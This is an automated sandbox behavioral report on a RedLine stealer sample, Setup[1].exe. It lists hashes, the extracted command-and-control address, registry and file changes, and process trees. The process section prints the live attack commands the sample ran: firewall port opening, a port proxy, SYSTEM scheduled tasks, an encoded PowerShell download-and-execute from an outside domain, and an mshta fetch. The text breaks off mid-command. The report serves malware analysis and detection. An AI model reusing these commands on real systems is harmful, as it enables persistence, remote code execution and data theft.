Analysis
-
max time kernel
301s -
max time network
302s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
05-04-2021 09:29
Static task
static1
Behavioral task
behavioral1
Sample
Setup[1].exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Setup[1].exe
Resource
win10v20201028
General
-
Target
Setup[1].exe
-
Size
1.3MB
-
MD5
0657125b7850a7b5796bf6979da502f0
-
SHA1
686d1ad201f0706daec7dd9bfa60fd1144a7b876
-
SHA256
c1a85afd7acdaf7ab0d6839cc68d67ca75455fa9fb3d62a95f6579f07899df49
-
SHA512
879167e0b34e015e62828151a05b785f3f9b99e2826be73fe9afc4d671dedec19c9994d2481c060e453367885ba16cce0252e7049bdb59c5ee90885f6527e10c
Malware Config
Extracted
redline
010402
194.135.20.72:3214
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1084-84-0x0000000000400000-0x0000000000430000-memory.dmp family_redline behavioral1/memory/1084-85-0x000000000042977E-mapping.dmp family_redline behavioral1/memory/1084-87-0x0000000000400000-0x0000000000430000-memory.dmp family_redline -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Executes dropped EXE 2 IoCs
Processes:
hqLA.exehqLA.exepid process 320 hqLA.exe 1752 hqLA.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 19 IoCs
Processes:
hqLA.exepid process 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe 1752 hqLA.exe -
Drops file in System32 directory 13 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c291b9b0-b5aa-4d49-8320-444a580f8c40 powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bd9b797-7a76-4920-b8d0-f22a652b3ccc powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_64ce8339-6b95-43e0-8f07-5e3f294423d0 powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a87914cb-e035-4944-8d5f-77d197cde3f1 powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8e088925-bbb9-4dbf-b9dc-6ed322a7a7d2 powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e40e2cca-02c2-4253-9484-20aa8c95aedb powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_851c9fd4-8d58-4184-85f7-81c8b3ece752 powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_310614a1-6063-46da-869d-045be1041252 powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4f6c43fc-7601-4f86-b68a-c3a338f0ea64 powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_79b338c7-ef89-42e6-8f75-f1046055a452 powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9d35177b-f716-450a-a1ec-23c8a9231b64 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Setup[1].exedescription pid process target process PID 384 set thread context of 1084 384 Setup[1].exe Setup[1].exe -
Drops file in Windows directory 13 IoCs
Processes:
hqLA.execmd.execmd.execmd.execmd.execmd.execmd.exedescription ioc process File created C:\Windows\mkatz.ini hqLA.exe File created \??\c:\windows\AQzNdfKa.exe cmd.exe File opened for modification \??\c:\windows\AQzNdfKa.exe cmd.exe File opened for modification \??\c:\windows\dwnoz.exe cmd.exe File opened for modification \??\c:\windows\aAKrYQe.exe cmd.exe File opened for modification \??\c:\windows\hqLA.exe cmd.exe File created C:\Windows\m2.ps1 hqLA.exe File created \??\c:\windows\DuooWvQ.exe cmd.exe File opened for modification \??\c:\windows\DuooWvQ.exe cmd.exe File opened for modification \??\c:\windows\DuooWvQ.exe cmd.exe File created \??\c:\windows\dwnoz.exe cmd.exe File created \??\c:\windows\aAKrYQe.exe cmd.exe File created \??\c:\windows\hqLA.exe cmd.exe -
Detects Pyinstaller 7 IoCs
Processes:
resource yara_rule C:\Windows\hqLA.exe pyinstaller C:\Windows\hqLA.exe pyinstaller C:\Windows\hqLA.exe pyinstaller \??\c:\windows\temp\svchost.exe pyinstaller \??\c:\windows\temp\svchost.exe pyinstaller \??\c:\windows\DuooWvQ.exe pyinstaller \??\c:\windows\temp\svchost.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1968 schtasks.exe 1748 schtasks.exe 1660 schtasks.exe 512 schtasks.exe 2876 schtasks.exe 1240 schtasks.exe 1004 schtasks.exe 2328 schtasks.exe 3084 schtasks.exe 3168 schtasks.exe 1000 schtasks.exe 3300 schtasks.exe 1636 schtasks.exe 1624 schtasks.exe 1708 schtasks.exe 2212 schtasks.exe 2228 schtasks.exe 2188 schtasks.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exenetstat.exepid process 956 ipconfig.exe 1040 ipconfig.exe 596 netstat.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
cmd.exeWScript.exenetsh.exenetsh.exeWScript.exeWScript.exeWScript.execmd.exeWScript.exenetsh.exepowershell.exenetsh.exenetsh.execmd.execmd.exeWScript.exeWScript.exenetsh.exenetsh.exenetsh.execmd.exenetsh.exenetsh.exenetsh.exeWMIC.execmd.execmd.execmd.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60a205bf0f2ad701 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 010000000000000000ff6f850f2ad701 WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000606b85850f2ad701 WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exeSetup[1].exehqLA.exepid process 1988 powershell.exe 1988 powershell.exe 384 Setup[1].exe 384 Setup[1].exe 384 Setup[1].exe 1988 powershell.exe 1988 powershell.exe 1988 powershell.exe 1988 powershell.exe 1988 powershell.exe 1752 hqLA.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
WMIC.exepowershell.exeSetup[1].exeSetup[1].exenetstat.exedescription pid process Token: SeAssignPrimaryTokenPrivilege 2020 WMIC.exe Token: SeIncreaseQuotaPrivilege 2020 WMIC.exe Token: SeSecurityPrivilege 2020 WMIC.exe Token: SeTakeOwnershipPrivilege 2020 WMIC.exe Token: SeLoadDriverPrivilege 2020 WMIC.exe Token: SeSystemtimePrivilege 2020 WMIC.exe Token: SeBackupPrivilege 2020 WMIC.exe Token: SeRestorePrivilege 2020 WMIC.exe Token: SeShutdownPrivilege 2020 WMIC.exe Token: SeSystemEnvironmentPrivilege 2020 WMIC.exe Token: SeUndockPrivilege 2020 WMIC.exe Token: SeManageVolumePrivilege 2020 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2020 WMIC.exe Token: SeIncreaseQuotaPrivilege 2020 WMIC.exe Token: SeSecurityPrivilege 2020 WMIC.exe Token: SeTakeOwnershipPrivilege 2020 WMIC.exe Token: SeLoadDriverPrivilege 2020 WMIC.exe Token: SeSystemtimePrivilege 2020 WMIC.exe Token: SeBackupPrivilege 2020 WMIC.exe Token: SeRestorePrivilege 2020 WMIC.exe Token: SeShutdownPrivilege 2020 WMIC.exe Token: SeSystemEnvironmentPrivilege 2020 WMIC.exe Token: SeUndockPrivilege 2020 WMIC.exe Token: SeManageVolumePrivilege 2020 WMIC.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 384 Setup[1].exe Token: SeDebugPrivilege 1084 Setup[1].exe Token: SeDebugPrivilege 596 netstat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
wsFeJZkc.execmd.exeWScript.execmd.exetaskeng.exehqLA.exehqLA.execmd.execmd.exenet.exedescription pid process target process PID 1728 wrote to memory of 1528 1728 wsFeJZkc.exe cmd.exe PID 1728 wrote to memory of 1528 1728 wsFeJZkc.exe cmd.exe PID 1728 wrote to memory of 1528 1728 wsFeJZkc.exe cmd.exe PID 1728 wrote to memory of 1528 1728 wsFeJZkc.exe cmd.exe PID 1528 wrote to memory of 464 1528 cmd.exe WScript.exe PID 1528 wrote to memory of 464 1528 cmd.exe WScript.exe PID 1528 wrote to memory of 464 1528 cmd.exe WScript.exe PID 1528 wrote to memory of 464 1528 cmd.exe WScript.exe PID 464 wrote to memory of 788 464 WScript.exe cmd.exe PID 464 wrote to memory of 788 464 WScript.exe cmd.exe PID 464 wrote to memory of 788 464 WScript.exe cmd.exe PID 464 wrote to memory of 788 464 WScript.exe cmd.exe PID 788 wrote to memory of 840 788 cmd.exe netsh.exe PID 788 wrote to memory of 840 788 cmd.exe netsh.exe PID 788 wrote to memory of 840 788 cmd.exe netsh.exe PID 788 wrote to memory of 840 788 cmd.exe netsh.exe PID 788 wrote to memory of 808 788 cmd.exe netsh.exe PID 788 wrote to memory of 808 788 cmd.exe netsh.exe PID 788 wrote to memory of 808 788 cmd.exe netsh.exe PID 788 wrote to memory of 808 788 cmd.exe netsh.exe PID 788 wrote to memory of 1636 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1636 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1636 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1636 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1624 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1624 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1624 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1624 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1000 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1000 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1000 788 cmd.exe schtasks.exe PID 788 wrote to memory of 1000 788 cmd.exe schtasks.exe PID 2004 wrote to memory of 320 2004 taskeng.exe hqLA.exe PID 2004 wrote to memory of 320 2004 taskeng.exe hqLA.exe PID 2004 wrote to memory of 320 2004 taskeng.exe hqLA.exe PID 2004 wrote to memory of 320 2004 taskeng.exe hqLA.exe PID 320 wrote to memory of 1752 320 hqLA.exe hqLA.exe PID 320 wrote to memory of 1752 320 hqLA.exe hqLA.exe PID 320 wrote to memory of 1752 320 hqLA.exe hqLA.exe PID 320 wrote to memory of 1752 320 hqLA.exe hqLA.exe PID 1752 wrote to memory of 1148 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 1148 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 1148 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 1148 1752 hqLA.exe cmd.exe PID 1148 wrote to memory of 2020 1148 cmd.exe WMIC.exe PID 1148 wrote to memory of 2020 1148 cmd.exe WMIC.exe PID 1148 wrote to memory of 2020 1148 cmd.exe WMIC.exe PID 1148 wrote to memory of 2020 1148 cmd.exe WMIC.exe PID 1752 wrote to memory of 2044 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 2044 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 2044 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 2044 1752 hqLA.exe cmd.exe PID 2044 wrote to memory of 1972 2044 cmd.exe net.exe PID 2044 wrote to memory of 1972 2044 cmd.exe net.exe PID 2044 wrote to memory of 1972 2044 cmd.exe net.exe PID 2044 wrote to memory of 1972 2044 cmd.exe net.exe PID 1972 wrote to memory of 576 1972 net.exe net1.exe PID 1972 wrote to memory of 576 1972 net.exe net1.exe PID 1972 wrote to memory of 576 1972 net.exe net1.exe PID 1972 wrote to memory of 576 1972 net.exe net1.exe PID 1752 wrote to memory of 1628 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 1628 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 1628 1752 hqLA.exe cmd.exe PID 1752 wrote to memory of 1628 1752 hqLA.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup[1].exe"C:\Users\Admin\AppData\Local\Temp\Setup[1].exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Setup[1].exe"C:\Users\Admin\AppData\Local\Temp\Setup[1].exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\wsFeJZkc.exeC:\Windows\wsFeJZkc.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo WjHqSrkT >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\hqLA.exe&move /y c:\windows\temp\dig.exe c:\windows\UhjnKz.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn hqLA /tr "C:\Windows\hqLA.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mlaI" /tr "c:\windows\UhjnKz.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\UhjnKz.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\hqLA.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn hqLA /tr "C:\Windows\hqLA.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mlaI" /tr "c:\windows\UhjnKz.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\GoUzJnoA.exeC:\Windows\GoUzJnoA.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo uYckTIp >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\DuooWvQ.exe&move /y c:\windows\temp\dig.exe c:\windows\CQLgUiaT.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mayAGat" /tr "c:\windows\CQLgUiaT.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 